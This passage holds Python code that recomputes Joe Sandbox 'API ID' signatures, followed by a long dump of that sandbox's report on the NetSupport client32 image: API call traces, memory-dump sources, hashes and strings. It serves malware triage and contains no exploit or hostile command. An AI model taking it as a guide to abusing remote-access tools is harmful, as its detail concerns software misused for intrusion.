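CALL_RE = re.compile(r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9]+)"
                     r"(?:\((?P<args>[^()]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)")
# CamelCase splitter: CreateDIBSection -> Create, DIB, Section; _memset stays whole.
TOKEN_RE = re.compile(r"[A-Z][a-z]+|[A-Z][A-Z0-9]*(?![a-z])|_[a-z]+")
MIN_TOKEN_LEN = 4            # assumption: drops Get/Set/Is and DC, DIB, Dlg, Pos, Id
COMPOUNDS = {("Critical", "Section"): "CriticalSection"}  # assumption: known compounds

def parse_calls(block):
    """Return (api, module, args, ref) for every call line in one APIs section."""
    found = (CALL_RE.search(line) for line in block.splitlines())
    return [(m["name"], m["module"], m["args"] or "", m["ref"]) for m in found if m]

def tokenize(api):
    """Words the signature is built from: suffix stripped, compounds merged, short tokens dropped."""
    toks = TOKEN_RE.findall(re.sub(r"(?<=[a-z])[AW]$", "", api))  # drop the A/W suffix
    merged, i = [], 0
    while i < len(toks):
        pair = tuple(toks[i:i + 2])
        merged.append(COMPOUNDS.get(pair, toks[i]))
        i += 2 if pair in COMPOUNDS else 1
    return [t for t in merged if len(t) >= MIN_TOKEN_LEN]

def api_id(block):
    """Tokens grouped by call frequency (descending), '$' between groups,
    alphabetical inside a group: repeated calls outweigh one-off calls."""
    counts = Counter(t for api, *_ in parse_calls(block) for t in tokenize(api))
    groups = {}
    for tok, n in counts.items():
        groups.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))

# APIs sections of four function entries in this report, copied verbatim, keyed by
# the API ID the report prints for each.
SAMPLES = {
    "Menu$Item$Count$CreateInfoInsertPopup_memset": """
• GetMenuItemCount.USER32(?), ref: 1114513D
• _memset.LIBCMT ref: 1114515E
• GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1114519B
• CreatePopupMenu.USER32 ref: 111451AA
• GetMenuItemCount.USER32(?), ref: 111451D3
• InsertMenuItemA.USER32(?,00000000,00000001,00000030), ref: 111451E4
• GetMenuItemCount.USER32(?), ref: 111451EB
""",
    "Window$Rect$Parent$EnabledIntersectItemMessagePost": """
• GetParent.USER32(?), ref: 11039768
• GetDlgItem.USER32(00000000,00000001), ref: 11039771
• IsWindowEnabled.USER32(00000000), ref: 11039778
• PostMessageA.USER32(?,00000100,00000009,000F0001), ref: 110397A5
• GetParent.USER32(?), ref: 110397B6
• GetWindowRect.USER32(?,?), ref: 110397C3
• IntersectRect.USER32(?,?,?), ref: 110397FC
• GetWindowRect.USER32(00000000,?), ref: 11039836
• SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015), ref: 11039855
""",
    "Select$CreateObjectPalette$CompatibleDeleteReleaseSection": """
• GetDC.USER32(00000000), ref: 11153763
• CreateCompatibleDC.GDI32(00000000), ref: 11153779
• SelectPalette.GDI32(00000000,?,00000000), ref: 1115385F
• CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 11153887
• SelectObject.GDI32(00000000,00000000), ref: 1115389B
• SelectObject.GDI32(00000000,?), ref: 111538C1
• SelectPalette.GDI32(00000000,?,00000000), ref: 111538D1
• DeleteDC.GDI32(00000000), ref: 111538D8
• ReleaseDC.USER32(00000000,?), ref: 111538E7
""",
    "CriticalSection$Leave$Message$EnterSend$CurrentDestroyDialogThreadWindow": """
• Part of subcall function 111103D0: GetCurrentThreadId.KERNEL32 ref: 111103DE
• Part of subcall function 111103D0: EnterCriticalSection.KERNEL32(00000000,76963760,00000000,111F1590,?,110CD955,00000000,76963760), ref: 111103E8
• Part of subcall function 111103D0: LeaveCriticalSection.KERNEL32(00000000,7697A1D0,00000000,?,110CD955,00000000,76963760), ref: 11110408
• EnterCriticalSection.KERNEL32(00000000,00000000,76963760,00000000,7697A1D0,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
• SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD988
• SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD99A
• LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
• IsDialogMessageA.USER32(00000000,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9BB
• LeaveCriticalSection.KERNEL32(00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9D1
• DestroyWindow.USER32(00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9E1
• LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9EB
• LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CDA01
""",
}

def verify():
    """Map each page signature to whether the inferred rule reproduces it."""
    return {want: api_id(block) == want for want, block in SAMPLES.items()}
```

The point of recomputing the signature rather than just reading it off the report is that the same function can then be looked up across many reports (or across the 12 memory dumps of this client32 image) by API ID alone, without the fuzzy hashes, which is useful when triaging a family like NetSupport whose components are legitimate remote-control code. Note that the "Part of subcall function" lines count towards the frequencies, which is why CriticalSection outranks Leave in the fourth signature. The fifth entry below (GetStockObject, FillRect, SetROP2, SetBkMode and the SetText* calls) has its API ID cut off on this page, so the rule has not been checked against it; the ROP2 token, four characters long, would survive the length filter, and whether the vendor keeps it is unknown.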
APIs
• GetStockObject.GDI32(00000003), ref: 111135A7
• FillRect.USER32(?,?,00000000), ref: 111135C4
• FillRect.USER32(?,?,00000000), ref: 111135D2
• SetROP2.GDI32(?,00000007), ref: 111135FE
• SetBkMode.GDI32(?,?), ref: 1111360A
• SetBkColor.GDI32(?,?), ref: 11113615
• SetTextColor.GDI32(?,?), ref: 11113620
• SetTextJustification.GDI32(?,?,?), ref: 11113631
• SetTextCharacterExtra.GDI32(?,?), ref: 1111363D
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Text$ColorFillRect$CharacterExtraJustificationModeObjectStock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1094208222-0
                                                                                                                                                    • Opcode ID: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
                                                                                                                                                    • Instruction ID: 11fb3597ac11fe0070853bb1276331f7103533f07ae90b5f1526d6834acfdad0
                                                                                                                                                    • Opcode Fuzzy Hash: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
                                                                                                                                                    • Instruction Fuzzy Hash: CE2148B1D01128AFDB04DFA4D988AFEB7B8EF48315F104169FD15AB208D7746A01CBA0
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11196940), ref: 1100D4D4
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11196930), ref: 1100D4E8
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11196920), ref: 1100D4FD
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11196910), ref: 1100D511
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11196904), ref: 1100D525
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111968E4), ref: 1100D53A
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111968C4), ref: 1100D54E
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111968B4), ref: 1100D562
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111968A4), ref: 1100D577
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 190572456-0
                                                                                                                                                    • Opcode ID: 48f9917a60cec6284becfcab2cdcd3c09a63cc3d8906f3dcaa48a20254382f18
                                                                                                                                                    • Instruction ID: 68c230a61e409724fd33842e5b4cb172798431ad54f26f9eb7569f07803db95b
                                                                                                                                                    • Opcode Fuzzy Hash: 48f9917a60cec6284becfcab2cdcd3c09a63cc3d8906f3dcaa48a20254382f18
                                                                                                                                                    • Instruction Fuzzy Hash: E3318CB19127349FEB16CBD8C8C9A79BBE9A758749F80453AD43083248E7B65844CF60
                                                                                                                                                    APIs
                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D98F
                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9A9
                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9B6
                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9C3
                                                                                                                                                    • SetEvent.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9D5
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9DF
                                                                                                                                                    • SetEvent.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9F1
                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9FB
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109DA08
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandle$Event$FileUnmapView
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2427653990-0
                                                                                                                                                    • Opcode ID: 1acc1433f5a53ddd11cd649e4de06c5f5174080ef02ec046c8e85dcc12a9f492
                                                                                                                                                    • Instruction ID: ef7400aadcbdc77f3d4b8b656ca31cdf014edcd8fc82e503e85a70b1789423f5
                                                                                                                                                    • Opcode Fuzzy Hash: 1acc1433f5a53ddd11cd649e4de06c5f5174080ef02ec046c8e85dcc12a9f492
                                                                                                                                                    • Instruction Fuzzy Hash: 7B11ECB1A407489BD730EFAAC9D481AFBF9AF583043514D7EE19AC3A10C634E8489B50
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                    • _memset.LIBCMT ref: 110433A9
                                                                                                                                                    • GetSystemMetrics.USER32(0000004C), ref: 110433B9
                                                                                                                                                    • GetSystemMetrics.USER32(0000004D), ref: 110433C1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MetricsSystem$__wcstoi64_memset
                                                                                                                                                    • String ID: Client$DisableTouch$Inject Touch Down @ %d,%d, w=%d,h=%d, id=%d$Inject Touch Up @ %d,%d, id=%d
                                                                                                                                                    • API String ID: 3760389471-710950153
                                                                                                                                                    • Opcode ID: 6ae8af2f14032af259bd57272b05dbbc70a801c8653cb383b5f76f4abd90dcc8
                                                                                                                                                    • Instruction ID: 3df93499149cd7a4cb1b4a3ff8c52798864cd21da05d47721e0dc8214685208f
                                                                                                                                                    • Opcode Fuzzy Hash: 6ae8af2f14032af259bd57272b05dbbc70a801c8653cb383b5f76f4abd90dcc8
                                                                                                                                                    • Instruction Fuzzy Hash: 2491D270D0465A9FCB04DFA9C880AEEFBF5FF48304F108169E555AB294DB34A905CB90
APIs
• InflateRect.USER32(?,000000FF,000000FF), ref: 1101F564
• InflateRect.USER32(?,000000FF,000000FF), ref: 1101F5B8
• GetBkColor.GDI32(?), ref: 1101F5BE
• GetTextColor.GDI32(?), ref: 1101F645
  • Part of subcall function 1101EF10: GetSysColor.USER32(00000011), ref: 1101EF58
  • Part of subcall function 1101EF10: SetTextColor.GDI32(?,00000000), ref: 1101EF63
  • Part of subcall function 1101EF10: SetBkColor.GDI32(?,?), ref: 1101EF81
  • Part of subcall function 1101EF10: SelectObject.GDI32(?,?), ref: 1101F00D
  • Part of subcall function 1101EF10: GetSystemMetrics.USER32(00000047), ref: 1101F018
  • Part of subcall function 1101EF10: DrawTextA.USER32(?,?,?,?,00000024), ref: 1101F056
  • Part of subcall function 1101EF10: SelectObject.GDI32(?,?), ref: 1101F064
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Color$Text$InflateObjectRectSelect$DrawMetricsSystem
• String ID: VUUU$VUUU
• API String ID: 179481525-3149182767
APIs
• GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 1103B476
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1103B49C
• SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?), ref: 1103B4C2
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Directory$FolderPathSystemWindows
• String ID: "%PROG%$%SYS%$%WIN%$c:\program files
• API String ID: 1538031420-1992112792
APIs
  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
• InitializeCriticalSection.KERNEL32(0000000C), ref: 11061790
• RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,11195264,00000000,0002001F,00000000,00000008,?,?,00000001,00000001), ref: 110617F5
• RegCreateKeyExA.ADVAPI32(00000000,?,00000000,11195264,00000000,00020019,00000000,00000008,?), ref: 1106181C
• RegCreateKeyExA.ADVAPI32(00000000,ConfigList,00000000,11195264,00000000,0002001F,00000000,?,?), ref: 1106185B
• RegCreateKeyExA.ADVAPI32(?,ConfigList,00000000,11195264,00000000,00020019,00000000,?,?), ref: 1106188F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Create$CriticalInitializeSection_malloc_memsetwsprintf
• String ID: ConfigList$PCICTL
• API String ID: 4014706405-1939909508
APIs
• _memset.LIBCMT ref: 6CA86DFD
• #16.WSOCK32(6CA8A730,?,00000001,00000000,?,6CA8A730,?,00002000,,?,6CA8ACF4,00000000,00000000,?,?,00000010), ref: 6CA86E4C
• WSASetLastError.WSOCK32(00002747,?,6CA8A730,?,00002000,,?,6CA8ACF4,00000000,00000000,?,?,00000010,00000002,00000001,00000000), ref: 6CA86F25
• WSASetLastError.WSOCK32(00002745,6CA8A730,?,00000001,00000000,?,6CA8A730,?,00002000,,?,6CA8ACF4,00000000,00000000,?,?), ref: 6CA86F36
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_memset
• String ID: $Content-Length:$HTTP/
• API String ID: 536390146-1146010681
APIs
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110276B3
• TranslateMessage.USER32(?), ref: 110276E1
• DispatchMessageA.USER32(?), ref: 110276EB
• Sleep.KERNEL32(000003E8), ref: 11027774
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110277DA
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Similarity
• API ID: Message$DispatchSleepTranslate
• String ID: Bridge$BridgeThread::Attempting to open bridge...
• API String ID: 3237117195-3850961587
APIs
• GetWindowPlacement.USER32(00000000,0000002C,110C032C,?,Norm,110C032C), ref: 110B9594
• MoveWindow.USER32(00000000,110C032C,110C032C,110C032C,110C032C,00000001,?,Norm,110C032C), ref: 110B9606
• SetTimer.USER32(00000000,0000050D,000007D0,00000000), ref: 110B9661
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Similarity
• API ID: Window$ErrorExitLastMessageMovePlacementProcessTimerwsprintf
• String ID: Norm$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$j CB::OnRemoteSizeNormal(%d, %d, %d, %d)$m_hWnd
• API String ID: 1092798621-1973987134
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 1100F4AD
• std::_Lockit::_Lockit.LIBCPMT ref: 1100F4D0
• std::bad_exception::bad_exception.LIBCMT ref: 1100F554
• __CxxThrowException@8.LIBCMT ref: 1100F562
• std::_Lockit::_Lockit.LIBCPMT ref: 1100F575
• std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F58F
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Similarity
• API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
• String ID: bad cast
• API String ID: 2427920155-3145022300
APIs
• WaitForSingleObject.KERNEL32(0000027C,000003E8), ref: 1113572F
• GetTickCount.KERNEL32 ref: 1113578C
  • Part of subcall function 111449B0: GetTickCount.KERNEL32 ref: 11144A18
• wsprintfA.USER32 ref: 111357BC
  • Part of subcall function 110B86C0: ExitProcess.KERNEL32 ref: 110B8702
• WaitForSingleObject.KERNEL32(0000027C,000003E8), ref: 11135802
Strings
• Client possibly unresponsive for %d ms (tid=%d)Callstack:, xrefs: 111357B6
• UI.CPP, xrefs: 111357E9
• ResponseChk, xrefs: 11135717
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Similarity
• API ID: CountObjectSingleTickWait$ExitProcesswsprintf
• String ID: Client possibly unresponsive for %d ms (tid=%d)Callstack:$ResponseChk$UI.CPP
• API String ID: 2020353970-2880927372
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 110F1655
• GetShortPathNameA.KERNEL32(?,?,00000104), ref: 110F166A
  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
• CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F16C3
• CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F1708
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
